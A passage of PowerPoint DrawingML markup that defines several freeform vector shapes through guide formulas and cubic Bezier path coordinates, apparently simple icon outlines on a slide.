                <a:gd name="T24" fmla="*/ 2 w 33"/>
                <a:gd name="T25" fmla="*/ 0 h 95"/>
                <a:gd name="T26" fmla="*/ 29 w 33"/>
                <a:gd name="T27" fmla="*/ 1 h 95"/>
                <a:gd name="T28" fmla="*/ 31 w 33"/>
                <a:gd name="T29" fmla="*/ 3 h 95"/>
                <a:gd name="T30" fmla="*/ 32 w 33"/>
                <a:gd name="T31" fmla="*/ 93 h 95"/>
                <a:gd name="T32" fmla="*/ 30 w 33"/>
                <a:gd name="T3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95">
                  <a:moveTo>
                    <a:pt x="30" y="95"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="30" y="95"/>
                    <a:pt x="30" y="95"/>
                    <a:pt x="30" y="95"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="29" y="95"/>
                    <a:pt x="28" y="94"/>
                    <a:pt x="28" y="93"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="28" y="68"/>
                    <a:pt x="27" y="15"/>
                    <a:pt x="27" y="5"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="23" y="5"/>
                    <a:pt x="12" y="4"/>
                    <a:pt x="4" y="4"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4" y="26"/>
                    <a:pt x="4" y="54"/>
                    <a:pt x="4" y="93"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4" y="94"/>
                    <a:pt x="3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1" y="94"/>
                    <a:pt x="0" y="94"/>
                    <a:pt x="0" y="92"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="53"/>
                    <a:pt x="0" y="24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2" y="0"/>
                    <a:pt x="29" y="1"/>
                    <a:pt x="29" y="1"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="30" y="1"/>
                    <a:pt x="31" y="2"/>
                    <a:pt x="31" y="3"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="31" y="4"/>
                    <a:pt x="33" y="65"/>
                    <a:pt x="32" y="93"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="32" y="94"/>
                    <a:pt x="31" y="95"/>
                    <a:pt x="30" y="95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Freeform 72"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3716337" y="5056188"/>
              <a:ext cx="366713" cy="157163"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 30 w 49"/>
                <a:gd name="T1" fmla="*/ 21 h 21"/>
                <a:gd name="T2" fmla="*/ 29 w 49"/>
                <a:gd name="T3" fmla="*/ 20 h 21"/>
                <a:gd name="T4" fmla="*/ 29 w 49"/>
                <a:gd name="T5" fmla="*/ 17 h 21"/>
                <a:gd name="T6" fmla="*/ 36 w 49"/>
                <a:gd name="T7" fmla="*/ 10 h 21"/>
                <a:gd name="T8" fmla="*/ 42 w 49"/>
                <a:gd name="T9" fmla="*/ 4 h 21"/>
                <a:gd name="T10" fmla="*/ 21 w 49"/>
                <a:gd name="T11" fmla="*/ 4 h 21"/>
                <a:gd name="T12" fmla="*/ 3 w 49"/>
                <a:gd name="T13" fmla="*/ 20 h 21"/>
                <a:gd name="T14" fmla="*/ 0 w 49"/>
                <a:gd name="T15" fmla="*/ 19 h 21"/>
                <a:gd name="T16" fmla="*/ 1 w 49"/>
                <a:gd name="T17" fmla="*/ 17 h 21"/>
                <a:gd name="T18" fmla="*/ 19 w 49"/>
                <a:gd name="T19" fmla="*/ 1 h 21"/>
                <a:gd name="T20" fmla="*/ 20 w 49"/>
                <a:gd name="T21" fmla="*/ 0 h 21"/>
                <a:gd name="T22" fmla="*/ 47 w 49"/>
                <a:gd name="T23" fmla="*/ 0 h 21"/>
                <a:gd name="T24" fmla="*/ 49 w 49"/>
                <a:gd name="T25" fmla="*/ 2 h 21"/>
                <a:gd name="T26" fmla="*/ 48 w 49"/>
                <a:gd name="T27" fmla="*/ 4 h 21"/>
                <a:gd name="T28" fmla="*/ 39 w 49"/>
                <a:gd name="T29" fmla="*/ 13 h 21"/>
                <a:gd name="T30" fmla="*/ 31 w 49"/>
                <a:gd name="T31" fmla="*/ 20 h 21"/>
                <a:gd name="T32" fmla="*/ 30 w 49"/>
                <a:gd name="T3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21">
                  <a:moveTo>
                    <a:pt x="30" y="21"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="30" y="21"/>
                    <a:pt x="29" y="21"/>
                    <a:pt x="29" y="20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32" y="15"/>
                    <a:pt x="34" y="12"/>
                    <a:pt x="36" y="10"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="38" y="8"/>
                    <a:pt x="40" y="6"/>
                    <a:pt x="42" y="4"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="34" y="4"/>
                    <a:pt x="24" y="4"/>
                    <a:pt x="21" y="4"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="19" y="6"/>
                    <a:pt x="12" y="12"/>
                    <a:pt x="3" y="20"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2" y="20"/>
                    <a:pt x="1" y="20"/>
                    <a:pt x="0" y="19"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="19"/>
                    <a:pt x="0" y="17"/>
                    <a:pt x="1" y="17"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="11" y="8"/>
                    <a:pt x="19" y="1"/>
                    <a:pt x="19" y="1"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="19" y="1"/>
                    <a:pt x="20" y="0"/>
                    <a:pt x="20" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="20" y="0"/>
                    <a:pt x="38" y="0"/>
                    <a:pt x="47" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="48" y="0"/>
                    <a:pt x="49" y="1"/>
                    <a:pt x="49" y="2"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="49" y="3"/>
                    <a:pt x="49" y="3"/>
                    <a:pt x="48" y="4"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="45" y="7"/>
                    <a:pt x="42" y="10"/>
                    <a:pt x="39" y="13"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="37" y="15"/>
                    <a:pt x="35" y="17"/>
                    <a:pt x="31" y="20"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="31" y="21"/>
                    <a:pt x="31" y="21"/>
                    <a:pt x="30" y="2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Freeform 73"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4052888" y="5056188"/>
              <a:ext cx="38100" cy="763588"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 3 w 5"/>
                <a:gd name="T1" fmla="*/ 102 h 102"/>
                <a:gd name="T2" fmla="*/ 1 w 5"/>
                <a:gd name="T3" fmla="*/ 100 h 102"/>
                <a:gd name="T4" fmla="*/ 0 w 5"/>
                <a:gd name="T5" fmla="*/ 2 h 102"/>
                <a:gd name="T6" fmla="*/ 2 w 5"/>
                <a:gd name="T7" fmla="*/ 1 h 102"/>
                <a:gd name="T8" fmla="*/ 4 w 5"/>
                <a:gd name="T9" fmla="*/ 3 h 102"/>
                <a:gd name="T10" fmla="*/ 5 w 5"/>
                <a:gd name="T11" fmla="*/ 100 h 102"/>
                <a:gd name="T12" fmla="*/ 3 w 5"/>
                <a:gd name="T13" fmla="*/ 102 h 102"/>
                <a:gd name="T14" fmla="*/ 3 w 5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02">
                  <a:moveTo>
                    <a:pt x="3" y="102"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2" y="102"/>
                    <a:pt x="1" y="101"/>
                    <a:pt x="1" y="100"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="64"/>
                    <a:pt x="0" y="4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3" y="1"/>
                    <a:pt x="4" y="2"/>
                    <a:pt x="4" y="3"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4" y="5"/>
                    <a:pt x="4" y="53"/>
                    <a:pt x="5" y="100"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5" y="101"/>
                    <a:pt x="4" y="102"/>
                    <a:pt x="3" y="102"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3" y="102"/>
                    <a:pt x="3" y="102"/>
                    <a:pt x="3" y="102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Freeform 74"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3716337" y="5857876"/>
              <a:ext cx="239713" cy="36513"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 30 w 32"/>
                <a:gd name="T1" fmla="*/ 5 h 5"/>
                <a:gd name="T2" fmla="*/ 30 w 32"/>
                <a:gd name="T3" fmla="*/ 5 h 5"/>
                <a:gd name="T4" fmla="*/ 16 w 32"/>
                <a:gd name="T5" fmla="*/ 4 h 5"/>
                <a:gd name="T6" fmla="*/ 2 w 32"/>
                <a:gd name="T7" fmla="*/ 4 h 5"/>
                <a:gd name="T8" fmla="*/ 0 w 32"/>
                <a:gd name="T9" fmla="*/ 2 h 5"/>
                <a:gd name="T10" fmla="*/ 2 w 32"/>
                <a:gd name="T11" fmla="*/ 0 h 5"/>
                <a:gd name="T12" fmla="*/ 16 w 32"/>
                <a:gd name="T13" fmla="*/ 0 h 5"/>
                <a:gd name="T14" fmla="*/ 30 w 32"/>
                <a:gd name="T15" fmla="*/ 1 h 5"/>
                <a:gd name="T16" fmla="*/ 32 w 32"/>
                <a:gd name="T17" fmla="*/ 3 h 5"/>
                <a:gd name="T18" fmla="*/ 30 w 32"/>
                <a:gd name="T1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5"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24" y="5"/>
                    <a:pt x="20" y="5"/>
                    <a:pt x="16" y="4"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="4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" y="0"/>
                    <a:pt x="12" y="0"/>
                    <a:pt x="16" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="20" y="1"/>
                    <a:pt x="25" y="1"/>
                    <a:pt x="30" y="1"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="31" y="1"/>
                    <a:pt x="32" y="2"/>
                    <a:pt x="32" y="3"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="32" y="4"/>
                    <a:pt x="31" y="5"/>
                    <a:pt x="30" y="5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6" name="Freeform 75"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3925888" y="5789613"/>
              <a:ext cx="165100" cy="104775"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 2 w 22"/>
                <a:gd name="T1" fmla="*/ 14 h 14"/>
                <a:gd name="T2" fmla="*/ 0 w 22"/>
                <a:gd name="T3" fmla="*/ 13 h 14"/>
                <a:gd name="T4" fmla="*/ 1 w 22"/>
                <a:gd name="T5" fmla="*/ 10 h 14"/>
                <a:gd name="T6" fmla="*/ 18 w 22"/>
                <a:gd name="T7" fmla="*/ 0 h 14"/>
                <a:gd name="T8" fmla="*/ 21 w 22"/>
                <a:gd name="T9" fmla="*/ 1 h 14"/>
                <a:gd name="T10" fmla="*/ 21 w 22"/>
                <a:gd name="T11" fmla="*/ 4 h 14"/>
                <a:gd name="T12" fmla="*/ 3 w 22"/>
                <a:gd name="T13" fmla="*/ 14 h 14"/>
                <a:gd name="T14" fmla="*/ 2 w 22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4">
                  <a:moveTo>
                    <a:pt x="2" y="14"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="14"/>
                    <a:pt x="0" y="14"/>
                    <a:pt x="0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7" y="8"/>
                    <a:pt x="13" y="4"/>
                    <a:pt x="18" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="19" y="0"/>
                    <a:pt x="20" y="0"/>
                    <a:pt x="21" y="1"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="22" y="2"/>
                    <a:pt x="21" y="3"/>
                    <a:pt x="21" y="4"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="15" y="8"/>
                    <a:pt x="9" y="11"/>
                    <a:pt x="3" y="14"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3" y="14"/>
                    <a:pt x="2" y="14"/>
                    <a:pt x="2" y="14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7" name="Freeform 76"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4979988" y="5033963"/>
              <a:ext cx="246063" cy="852488"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 30 w 33"/>
                <a:gd name="T1" fmla="*/ 114 h 114"/>
                <a:gd name="T2" fmla="*/ 30 w 33"/>
                <a:gd name="T3" fmla="*/ 114 h 114"/>
                <a:gd name="T4" fmla="*/ 28 w 33"/>
                <a:gd name="T5" fmla="*/ 112 h 114"/>
                <a:gd name="T6" fmla="*/ 28 w 33"/>
                <a:gd name="T7" fmla="*/ 5 h 114"/>
                <a:gd name="T8" fmla="*/ 4 w 33"/>
                <a:gd name="T9" fmla="*/ 4 h 114"/>
                <a:gd name="T10" fmla="*/ 5 w 33"/>
                <a:gd name="T11" fmla="*/ 112 h 114"/>
                <a:gd name="T12" fmla="*/ 3 w 33"/>
                <a:gd name="T13" fmla="*/ 114 h 114"/>
                <a:gd name="T14" fmla="*/ 3 w 33"/>
                <a:gd name="T15" fmla="*/ 114 h 114"/>
                <a:gd name="T16" fmla="*/ 1 w 33"/>
                <a:gd name="T17" fmla="*/ 111 h 114"/>
                <a:gd name="T18" fmla="*/ 0 w 33"/>
                <a:gd name="T19" fmla="*/ 2 h 114"/>
                <a:gd name="T20" fmla="*/ 1 w 33"/>
                <a:gd name="T21" fmla="*/ 1 h 114"/>
                <a:gd name="T22" fmla="*/ 2 w 33"/>
                <a:gd name="T23" fmla="*/ 0 h 114"/>
                <a:gd name="T24" fmla="*/ 2 w 33"/>
                <a:gd name="T25" fmla="*/ 0 h 114"/>
                <a:gd name="T26" fmla="*/ 30 w 33"/>
                <a:gd name="T27" fmla="*/ 1 h 114"/>
                <a:gd name="T28" fmla="*/ 32 w 33"/>
                <a:gd name="T29" fmla="*/ 3 h 114"/>
                <a:gd name="T30" fmla="*/ 32 w 33"/>
                <a:gd name="T31" fmla="*/ 112 h 114"/>
                <a:gd name="T32" fmla="*/ 30 w 33"/>
                <a:gd name="T3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114">
                  <a:moveTo>
                    <a:pt x="30" y="114"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="30" y="114"/>
                    <a:pt x="30" y="114"/>
                    <a:pt x="30" y="114"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="29" y="114"/>
                    <a:pt x="28" y="113"/>
                    <a:pt x="28" y="112"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="29" y="86"/>
                    <a:pt x="28" y="17"/>
                    <a:pt x="28" y="5"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="23" y="5"/>
                    <a:pt x="13" y="4"/>
                    <a:pt x="4" y="4"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5" y="29"/>
                    <a:pt x="5" y="77"/>
                    <a:pt x="5" y="112"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5" y="113"/>
                    <a:pt x="4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1" y="113"/>
                    <a:pt x="1" y="113"/>
                    <a:pt x="1" y="111"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="76"/>
                    <a:pt x="1" y="26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3" y="0"/>
                    <a:pt x="30" y="1"/>
                    <a:pt x="30" y="1"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="31" y="1"/>
                    <a:pt x="32" y="2"/>
                    <a:pt x="32" y="3"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="32" y="4"/>
                    <a:pt x="33" y="84"/>
                    <a:pt x="32" y="112"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="32" y="113"/>
                    <a:pt x="31" y="114"/>
                    <a:pt x="30" y="114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8" name="Freeform 77"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4979988" y="4913313"/>
              <a:ext cx="373063" cy="157163"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 31 w 50"/>
                <a:gd name="T1" fmla="*/ 21 h 21"/>
                <a:gd name="T2" fmla="*/ 29 w 50"/>
                <a:gd name="T3" fmla="*/ 20 h 21"/>
                <a:gd name="T4" fmla="*/ 29 w 50"/>
                <a:gd name="T5" fmla="*/ 17 h 21"/>
                <a:gd name="T6" fmla="*/ 37 w 50"/>
                <a:gd name="T7" fmla="*/ 10 h 21"/>
                <a:gd name="T8" fmla="*/ 42 w 50"/>
                <a:gd name="T9" fmla="*/ 4 h 21"/>
                <a:gd name="T10" fmla="*/ 21 w 50"/>
                <a:gd name="T11" fmla="*/ 4 h 21"/>
                <a:gd name="T12" fmla="*/ 4 w 50"/>
                <a:gd name="T13" fmla="*/ 20 h 21"/>
                <a:gd name="T14" fmla="*/ 1 w 50"/>
                <a:gd name="T15" fmla="*/ 19 h 21"/>
                <a:gd name="T16" fmla="*/ 1 w 50"/>
                <a:gd name="T17" fmla="*/ 17 h 21"/>
                <a:gd name="T18" fmla="*/ 19 w 50"/>
                <a:gd name="T19" fmla="*/ 1 h 21"/>
                <a:gd name="T20" fmla="*/ 21 w 50"/>
                <a:gd name="T21" fmla="*/ 0 h 21"/>
                <a:gd name="T22" fmla="*/ 48 w 50"/>
                <a:gd name="T23" fmla="*/ 0 h 21"/>
                <a:gd name="T24" fmla="*/ 49 w 50"/>
                <a:gd name="T25" fmla="*/ 2 h 21"/>
                <a:gd name="T26" fmla="*/ 49 w 50"/>
                <a:gd name="T27" fmla="*/ 4 h 21"/>
                <a:gd name="T28" fmla="*/ 40 w 50"/>
                <a:gd name="T29" fmla="*/ 13 h 21"/>
                <a:gd name="T30" fmla="*/ 32 w 50"/>
                <a:gd name="T31" fmla="*/ 20 h 21"/>
                <a:gd name="T32" fmla="*/ 31 w 50"/>
                <a:gd name="T3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21">
                  <a:moveTo>
                    <a:pt x="31" y="21"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="30" y="21"/>
                    <a:pt x="30" y="21"/>
                    <a:pt x="29" y="20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32" y="15"/>
                    <a:pt x="35" y="12"/>
                    <a:pt x="37" y="10"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="39" y="8"/>
                    <a:pt x="40" y="6"/>
                    <a:pt x="42" y="4"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="35" y="4"/>
                    <a:pt x="24" y="4"/>
                    <a:pt x="21" y="4"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="19" y="6"/>
                    <a:pt x="13" y="12"/>
                    <a:pt x="4" y="20"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3" y="20"/>
                    <a:pt x="2" y="20"/>
                    <a:pt x="1" y="19"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="19"/>
                    <a:pt x="0" y="17"/>
                    <a:pt x="1" y="17"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="8"/>
                    <a:pt x="19" y="1"/>
                    <a:pt x="19" y="1"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="20" y="1"/>
                    <a:pt x="20" y="0"/>
                    <a:pt x="21" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="21" y="0"/>
                    <a:pt x="39" y="0"/>
                    <a:pt x="48" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="48" y="0"/>
                    <a:pt x="49" y="1"/>
                    <a:pt x="49" y="2"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="50" y="3"/>
                    <a:pt x="49" y="3"/>
                    <a:pt x="49" y="4"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="45" y="7"/>
                    <a:pt x="43" y="10"/>
                    <a:pt x="40" y="13"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="37" y="15"/>
                    <a:pt x="35" y="17"/>
                    <a:pt x="32" y="20"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="32" y="21"/>
                    <a:pt x="31" y="21"/>
                    <a:pt x="31" y="2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9" name="Freeform 78"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5316538" y="4913313"/>
              <a:ext cx="36513" cy="906463"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 3 w 5"/>
                <a:gd name="T1" fmla="*/ 121 h 121"/>
                <a:gd name="T2" fmla="*/ 1 w 5"/>
                <a:gd name="T3" fmla="*/ 119 h 121"/>
                <a:gd name="T4" fmla="*/ 1 w 5"/>
                <a:gd name="T5" fmla="*/ 2 h 121"/>
                <a:gd name="T6" fmla="*/ 3 w 5"/>
                <a:gd name="T7" fmla="*/ 1 h 121"/>
                <a:gd name="T8" fmla="*/ 5 w 5"/>
                <a:gd name="T9" fmla="*/ 3 h 121"/>
                <a:gd name="T10" fmla="*/ 5 w 5"/>
                <a:gd name="T11" fmla="*/ 119 h 121"/>
                <a:gd name="T12" fmla="*/ 3 w 5"/>
                <a:gd name="T13" fmla="*/ 121 h 121"/>
                <a:gd name="T14" fmla="*/ 3 w 5"/>
                <a:gd name="T1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21">
                  <a:moveTo>
                    <a:pt x="3" y="121"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2" y="121"/>
                    <a:pt x="1" y="120"/>
                    <a:pt x="1" y="119"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="100"/>
                    <a:pt x="0" y="4"/>
                    <a:pt x="1" y="2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4" y="1"/>
                    <a:pt x="5" y="2"/>
                    <a:pt x="5" y="3"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4" y="6"/>
                    <a:pt x="5" y="89"/>
                    <a:pt x="5" y="119"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5" y="120"/>
                    <a:pt x="4" y="121"/>
                    <a:pt x="3" y="121"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3" y="121"/>
                    <a:pt x="3" y="121"/>
                    <a:pt x="3" y="12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0" name="Freeform 79"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4986338" y="5857876"/>
              <a:ext cx="239713" cy="36513"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 30 w 32"/>
                <a:gd name="T1" fmla="*/ 5 h 5"/>
                <a:gd name="T2" fmla="*/ 30 w 32"/>
                <a:gd name="T3" fmla="*/ 5 h 5"/>
                <a:gd name="T4" fmla="*/ 16 w 32"/>
                <a:gd name="T5" fmla="*/ 4 h 5"/>
                <a:gd name="T6" fmla="*/ 2 w 32"/>
                <a:gd name="T7" fmla="*/ 4 h 5"/>
                <a:gd name="T8" fmla="*/ 0 w 32"/>
                <a:gd name="T9" fmla="*/ 2 h 5"/>
                <a:gd name="T10" fmla="*/ 2 w 32"/>
                <a:gd name="T11" fmla="*/ 0 h 5"/>
                <a:gd name="T12" fmla="*/ 16 w 32"/>
                <a:gd name="T13" fmla="*/ 0 h 5"/>
                <a:gd name="T14" fmla="*/ 30 w 32"/>
                <a:gd name="T15" fmla="*/ 1 h 5"/>
                <a:gd name="T16" fmla="*/ 32 w 32"/>
                <a:gd name="T17" fmla="*/ 3 h 5"/>
                <a:gd name="T18" fmla="*/ 30 w 32"/>
                <a:gd name="T1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5"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24" y="5"/>
                    <a:pt x="20" y="5"/>
                    <a:pt x="16" y="4"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="11" y="4"/>
                    <a:pt x="7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" y="0"/>
                    <a:pt x="12" y="0"/>
                    <a:pt x="16" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="20" y="1"/>
                    <a:pt x="24" y="1"/>
                    <a:pt x="30" y="1"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="31" y="1"/>
                    <a:pt x="32" y="2"/>
                    <a:pt x="32" y="3"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="32" y="4"/>
                    <a:pt x="31" y="5"/>
                    <a:pt x="30" y="5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1" name="Freeform 80"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5189538" y="5789613"/>
              <a:ext cx="163513" cy="104775"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 2 w 22"/>
                <a:gd name="T1" fmla="*/ 14 h 14"/>
                <a:gd name="T2" fmla="*/ 1 w 22"/>
                <a:gd name="T3" fmla="*/ 13 h 14"/>
                <a:gd name="T4" fmla="*/ 2 w 22"/>
                <a:gd name="T5" fmla="*/ 10 h 14"/>
                <a:gd name="T6" fmla="*/ 19 w 22"/>
                <a:gd name="T7" fmla="*/ 0 h 14"/>
                <a:gd name="T8" fmla="*/ 22 w 22"/>
                <a:gd name="T9" fmla="*/ 1 h 14"/>
                <a:gd name="T10" fmla="*/ 21 w 22"/>
                <a:gd name="T11" fmla="*/ 4 h 14"/>
                <a:gd name="T12" fmla="*/ 3 w 22"/>
                <a:gd name="T13" fmla="*/ 14 h 14"/>
                <a:gd name="T14" fmla="*/ 2 w 22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4">
                  <a:moveTo>
                    <a:pt x="2" y="14"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2" y="14"/>
                    <a:pt x="1" y="14"/>
                    <a:pt x="1" y="13"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="12"/>
                    <a:pt x="1" y="11"/>
                    <a:pt x="2" y="10"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8" y="8"/>
                    <a:pt x="13" y="4"/>
                    <a:pt x="19" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="20" y="0"/>
                    <a:pt x="21" y="0"/>
                    <a:pt x="22" y="1"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="22" y="2"/>
                    <a:pt x="22" y="3"/>
                    <a:pt x="21" y="4"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="15" y="8"/>
                    <a:pt x="9" y="11"/>
                    <a:pt x="3" y="14"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3" y="14"/>
                    <a:pt x="3" y="14"/>
                    <a:pt x="2" y="14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2" name="Freeform 81"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3917950" y="5138738"/>
              <a:ext cx="150813" cy="193675"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 2 w 20"/>
                <a:gd name="T1" fmla="*/ 26 h 26"/>
                <a:gd name="T2" fmla="*/ 1 w 20"/>
                <a:gd name="T3" fmla="*/ 26 h 26"/>
                <a:gd name="T4" fmla="*/ 1 w 20"/>
                <a:gd name="T5" fmla="*/ 23 h 26"/>
                <a:gd name="T6" fmla="*/ 2 w 20"/>
                <a:gd name="T7" fmla="*/ 23 h 26"/>
                <a:gd name="T8" fmla="*/ 2 w 20"/>
                <a:gd name="T9" fmla="*/ 23 h 26"/>
                <a:gd name="T10" fmla="*/ 17 w 20"/>
                <a:gd name="T11" fmla="*/ 1 h 26"/>
                <a:gd name="T12" fmla="*/ 19 w 20"/>
                <a:gd name="T13" fmla="*/ 1 h 26"/>
                <a:gd name="T14" fmla="*/ 19 w 20"/>
                <a:gd name="T15" fmla="*/ 3 h 26"/>
                <a:gd name="T16" fmla="*/ 5 w 20"/>
                <a:gd name="T17" fmla="*/ 24 h 26"/>
                <a:gd name="T18" fmla="*/ 4 w 20"/>
                <a:gd name="T19" fmla="*/ 25 h 26"/>
                <a:gd name="T20" fmla="*/ 4 w 20"/>
